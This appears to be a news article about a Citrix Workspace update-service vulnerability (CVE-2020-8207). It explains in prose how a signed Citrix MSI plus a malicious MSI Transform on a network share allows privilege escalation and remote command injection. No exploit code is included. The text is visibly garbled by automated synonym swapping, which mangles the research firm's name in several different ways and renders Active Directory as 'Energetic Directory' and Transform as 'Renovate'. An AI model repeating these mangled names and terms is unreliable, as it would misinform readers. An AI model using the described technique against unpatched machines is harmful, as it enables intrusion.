Windows MSI documents provide an opening for attackers even though the bug was primarily patched in July.
A Citrix Workspace vulnerability that was fastened in July has been observed to have a secondary attack vector, which would allow for cybercriminals to elevate privileges and remotely execute arbitrary commands under the Process account.
The bug (CVE-2020-8207), exists in the automated update services of the Citrix Workspace application for Windows. It could let area privilege-escalation as well as distant compromise of a laptop working the app when Windows file sharing (SMB) is enabled, in accordance to the Citrix advisory.
The bug, however mostly set more than the summertime, was not too long ago identified to still make it possible for attackers to abuse Citrix-signed MSI installers, according to Pen Check Companions (MSI is the filename extension of Windows Installer offers). This turns the bug into a distant command-line injection vulnerability.
The update support at first relied on a faulty file hash within a JSON payload to figure out if an update really should proceed or not – permitting attackers to download their individual code by exploiting the weak hash. To deal with the difficulty, the most up-to-date update catalogs are now specifically downloaded from the Citrix update servers, and the assistance “cross-references the hashes with the file that is requested for set up from the UpdateFilePath attribute,” wrote researchers at Pen Check Associates, in a Monday posting.
“If the update file is signed, legitimate and the hash of the update file matches one of the data files inside of the manifest, the update file is executed to perform the update,” they spelled out.
However, the patch didn’t protect against remote connectivity to restrict the attack surface.
“The catalog consists of executables and MSI documents for set up,” in accordance to the organization. “MSI documents on the other hand simply cannot be executed in the exact same way as executable information, consequently the update assistance should manage these differently.”
In looking at the installer-launch code, the researchers uncovered that the application checks the extension of the file asked for for update, and if it ends with MSI, it is assumed to be a Windows Installer file. Due to the fact the MSI file is checked for a legitimate signature and is cross-referenced with the present-day catalog, attackers can’t immediately install arbitrary MSI data files.
Even although the MSI files are signed and hashed to avert modification, just one of the capabilities supported by the Windows Installer is MSI Transforms (MST).
“As the title implies, MSI Transforms guidance altering or reworking the MSI databases in some way prior to installation,” according to Pen Examination Companions. “Domain administrators commonly use this feature to thrust out MSI information inside Energetic Directory environments that do not always do the job in an unattended way when executed on their have. For instance, an MST could be produced that will inject a product activation code prior to installing.”
To use an MST, customers would specify the path to the rework file on the command line, which merges the key MSI file with alterations that are present in the MST file for the duration of the installation process.
Therein lies the bug: “Since we can regulate the arguments handed to msiexec, we can involve the path to a destructive Renovate but applying an formal, signed Citrix MSI that is current inside of the catalog file,” researchers explained.
Malicious Transforms can be created with an present resource referred to as Microsoft Orca, they added, or with a custom made tool. Then, to exploit the vulnerability, attackers would spot the authentic MSI installer and the MST onto a network share all set for the sufferer machine.
“Both the community and remote privilege-escalation strategies can only be exploited although an occasion of CitrixReceiverUpdate.exe is jogging on the target host as ahead of,” the researchers concluded. “I assume the remote vector is less difficult to exploit this time close to due to the fact you can area the two MSI and MST files on a network share under the attacker’s control.”
Citrix Workspace for Windows users really should update their apps to the latest variation, made up of a revised patch.
Some parts of this article is sourced from: